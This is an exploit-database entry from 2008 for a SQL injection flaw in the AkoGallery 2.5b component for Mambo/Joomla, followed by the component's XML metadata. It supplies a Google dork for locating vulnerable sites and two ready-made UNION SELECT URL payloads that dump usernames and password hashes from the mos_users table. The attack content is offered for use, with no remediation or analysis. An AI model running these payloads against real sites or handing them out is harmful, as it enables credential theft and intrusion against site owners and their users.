[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Mambo Component AkoGallery 2.5b SQL Injection Vulnerability
# Published : 2008-01-31
# Author : S@BUN
# Previous Title : sflog! 0.96 Remote File Disclosure Vulnerabilities
# Next Title : Mambo Component Catalogshop 1.0b1 SQL Injection Vulnerability
#########################################################################
#
#
# joomla SQL Injection(com_akogallery)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/
#########################################################################
#
# DorKs 1 : allinurl: "com_akogallery"
#
########################################################################
EXPLOIT :
index.php?option=com_akogallery&Itemid=S@BUN&func=detail&id=-334455/**/union/**/select/**/null,null,concat(password,0x3a),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,concat(0x3a,username)/**/from/**/mos_users/*
index.php?option=com_akogallery&Itemid=S@BUN&func=detail&id=-99999/**/union/**/select/**/null,null,concat(password,0x3a),null,null,null,null,null,null,null,null,null,null,concat(0x3a,username)/**/from/**/mos_users/*
#########################################################################
# S@BUN www.hackturkiye.com S@BUN
#########################################################################
# S@BUN GOOD LUCKY S@BUN
#########################################################################
<name>akogallery</name>
<creationDate>21.06.2004</creationDate>
<author>Arthur Konze</author>
<copyright>Copyright 2003, 2004 by Arthur Konze. Distribution prohibited!</copyright>
<authorEmail>webmaster@mamboportal.com</authorEmail>
<authorUrl>www.mamboportal.com</authorUrl>
<version>2.5 beta</version>
<description>AkoGallery is a fully integrated Mambo picture gallery component.</description>
# www.Syue.com [2008-01-31]